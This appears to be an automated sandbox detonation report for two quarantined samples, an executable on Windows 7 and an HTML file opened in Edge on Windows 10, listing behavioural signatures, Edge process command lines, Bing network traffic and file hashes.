| SHA512 | 82ce22df63cbb63c3d58f942b69ea4bca392c084f67305c5f63744afd7f4bf571222d4d3118816e60f91f0cf4ac9d9ea75cff5c6334aed1f486d3502d519ad00 |
Analysis: behavioral29
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240729-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"
Network
Files
memory/2916-0-0x000000013F610000-0x000000013F7BE000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
139s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ba2246f8,0x7ff8ba224708,0x7ff8ba224718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16542796225310005111,17240270875550966555,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3128 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3c6e13dc1762aa873320bed152204f3c |
| SHA1 | 38df427d38ca5ce6ce203490a9fb8461c7444e12 |
| SHA256 | 5c441148843b7c8dbff4c4a72962a532aaf0bdd484d07a03dd9a32fd461b1371 |
| SHA512 | 133054cb042e11013bfdad1bd11e3407d08cf26a66d0743bea9708d261aa904a1047bb0097b187ecf8436cb6cff3bec28c89e435862cad0e0fa264799556b70c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f5da507c2059b715761792e7106405f0 |
| SHA1 | a277fd608467c5a666cf4a4a3e16823b93c6777f |
| SHA256 | 8c1d99de087ac5f2e7b2afce66eff36a646bef46800c0c1d7737d6f0df74b7e8 |
| SHA512 | 01c92729dd8061aa122b116a674c73bb78016f66d2cb8f7fb64907352758a825e87a1e345334386440699d2a6d1e17baccb400c5aee151eb64e64019cbebb870 |
\??\pipe\LOCAL\crashpad_2560_IPXIRUHBMCTZIZTP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7b1714b9cd75ac382f61a090f333f520 |
| SHA1 | 7191b8e8f7cf5fecd33489dc7119bef1a833d6c1 |
| SHA256 | 0505e56cb286f6371e3c3f80aa45a124cec3ecce0c3a31248d8deee8edefec88 |
| SHA512 | 4eca557fb1178034818a1ec46e681b3936cc0edde93b36efdde813f4ab1f0ab74093388dba5d789d394e13a62b07c159d04fd89488951bcce35e36ae738b1c33 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1d4b5d6d4b2cc77c1748d5028b40f9fc |
| SHA1 | 9f3379d6162b95d74557d281bb403bb4a7ea17c5 |
| SHA256 | 7e5a7ccafb2a041d8b444184799beec08bda9ab2b778c3df42cea52d85155ed9 |
| SHA512 | 5899b9d61e04bab124f530af472f3b3b864b8c170e9a9a3d54d88ab77b85ae6b5bdef54c6f5cf03a839cd872359de80e11b9a6e3ca5b1f4b986b53cf9138a681 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8e07abdf4a3961e1baff4397a3ac770d |
| SHA1 | 743cd84f84cfe0bc6d8f2a620be541ead4ffc02e |
| SHA256 | 855a90255da0a76af0fdcee2c63ad9cabe22a84c2d983fb7cf688869538a96dc |
| SHA512 | 5d2ddcbf597eac6c8a2eca504e16084c3b86b597d83eebeb74f22c6fe9abf56973f9e2370c8daa4056077d774b9fff2ba316a778a4a7146d38da70ce7c20656a |